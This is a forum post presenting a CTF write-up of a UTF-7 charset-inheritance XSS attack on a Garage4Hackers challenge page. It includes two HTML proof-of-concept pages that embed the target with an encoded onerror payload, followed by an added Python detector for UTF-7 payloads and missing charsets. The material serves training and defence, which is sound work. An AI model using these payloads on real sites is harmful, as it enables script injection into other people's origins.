Thread: Garage4Hackers Nov XSS CTF 2014 Write-up

  #1 Webapp Secninja (joined Aug 2012, Ranchi, Jharkhand; 41 posts, 2 blog entries)

    Garage4Hackers Nov XSS CTF 2014 Write-up

    Hey!


    Just wanted to write a small post on the G4H XSS Challenge CTF for November. My solution was for older browsers (as I didn't manage to solve it for latest ones).

    Here's my solution:


    HTML Code:
    <html>
      <head>
        <!-- declares the outer document as UTF-7 so the embedded page inherits it -->
        <meta http-equiv="content-type" content="text/html;charset=utf-7">
      </head>
      <body>
        <center><h3>Run it in Firefox <= 3.6.6</h3></center>
        <!-- embeds the challenge page; the UTF-7 payload travels in the woot= parameter -->
        <object type="text/html; charset=UTF-7" data="http://198.50.254.202/?woot=%2bACIAPgA8-img%20src%2bAD0-x%20onerror%2bAD0AIg-alert%28document.domain%29%2bACIAPg" width="100%" height="100%"></object>
      </body>
    </html>
    Whether anyone noticed or not, the CTF website had a malformed charset header field, which means it is/was readily vulnerable to charset inheritance XSS attacks.

    The above code exploits a known bug in Firefox <= 3.6.6 that we use to embed the whole web page in the UTF-7 charset. While embedding the page we can load the XSS payload through GET (?woot=<XSS>). The UTF-7 payload is not detected by the XSS filter, and we execute an XSS attack on the challenge page's origin.


    Similar results can be accomplished for IE 6/7 (although I firmly believe this is possible on IE8 as well) using this bug:

    HTML Code:
    <html>
      <head>
        <!-- declares the outer document as UTF-7 so the framed page inherits it -->
        <meta http-equiv="content-type" content="text/html;charset=utf-7">
      </head>
      <body>
        <!-- frames the challenge page; replace the placeholder with the UTF-7 payload -->
        <iframe width="500" height="600" src="http://198.50.254.202/?woot=xss-payload-in-utf-7"></iframe>
      </body>
    </html>

    Result: [screenshot not preserved]
    Thanks for reading; feedback and views are welcome.
    Last edited by prakhar; 12-01-2014 at 12:49 PM.
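As an added defender-side example (not part of the post above, and not the CTF's own code): the two checks a reviewer of that challenge site would want. One decodes a query value the way a UTF-7-interpreting browser would and flags HTML metacharacters that a byte-level filter never sees; the other checks whether a Content-Type header actually carries a usable charset, which is the fix that stops charset inheritance. The sample query value is the write-up's payload shape, URL-encoded as constructed here.

```python
import re
from urllib.parse import unquote

# Constructed sample: the payload shape from the write-up as it would appear
# in the query string (%2b is '+', the UTF-7 shift character).
SAMPLE_QUERY_VALUE = (
    "%2bACIAPgA8-img%20src%2bAD0-x%20onerror%2bAD0AIg-alert%28document.domain%29%2bACIAPg"
)

HTML_META = re.compile(r'[<>"\']')
UTF7_SHIFT = re.compile(r'\+[A-Za-z0-9+/]*-?')   # '+...-' modified-base64 run


def decode_as_utf7(value: str) -> str:
    """Return the text a browser that treats the page as UTF-7 would see.

    unquote() rather than unquote_plus() is used on purpose: a literal '+' must
    survive, because it is the UTF-7 shift character, not an encoded space.
    Malformed runs decode to U+FFFD instead of raising.
    """
    raw = unquote(value)
    return raw.encode("ascii", "replace").decode("utf-7", errors="replace")


def contains_utf7_html(value: str) -> bool:
    """True if the value carries HTML metacharacters, either directly or only
    after UTF-7 decoding (the case an ASCII-only XSS filter misses)."""
    raw = unquote(value)
    if HTML_META.search(raw):
        return True                      # plain injection, visible to any filter
    if not UTF7_SHIFT.search(raw):
        return False                     # no shift sequence, nothing to decode
    return bool(HTML_META.search(decode_as_utf7(value)))


def charset_is_declared(content_type: str) -> bool:
    """True if a Content-Type header declares a syntactically valid charset
    that is not UTF-7. A missing or empty charset lets the browser inherit
    the encoding from the embedding document."""
    m = re.search(r';\s*charset\s*=\s*"?([A-Za-z0-9._:-]+)"?\s*(?:;|$)',
                  content_type, re.IGNORECASE)
    return bool(m) and m.group(1).lower() not in ("utf-7", "unicode-1-1-utf-7")


if __name__ == "__main__":
    print("decoded :", decode_as_utf7(SAMPLE_QUERY_VALUE))
    print("flagged :", contains_utf7_html(SAMPLE_QUERY_VALUE))
    for hdr in ("text/html", "text/html; charset=", "text/html; charset=utf-8"):
        print(f"{hdr!r:32} charset ok: {charset_is_declared(hdr)}")
```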
